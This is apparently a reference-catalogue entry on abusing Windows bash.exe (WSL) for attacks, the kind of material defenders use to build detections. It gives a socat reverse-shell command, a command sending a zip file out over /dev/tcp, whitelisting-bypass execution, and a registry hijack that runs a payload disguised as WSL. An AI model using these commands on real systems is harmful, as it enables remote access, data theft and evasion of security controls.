File used by Windows subsystem for Linux
Executes executable from bash.exe
bash.exe -c "{CMD}"
Performs execution of specified file, can be used as a defensive evasion.
Executes a reverse shell
bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
Performs execution of specified file, can be used as a defensive evasion.
Exfiltrate data
bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24'
Performs execution of specified file, can be used as a defensive evasion.
When executed, bash.exe queries the registry value of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\MSI\InstallLocation, which contains a folder path (c:\program files\wsl by default). If the value points to another folder containing a file named wsl.exe, it will be executed instead of the legitimate wsl.exe in the program files folder.
bash.exe
Execute a payload as a child process of bash.exe while masquerading as WSL.
Executes executable from bash.exe
bash.exe -c "{CMD}"
Performs execution of specified file, can be used to bypass Application Whitelisting.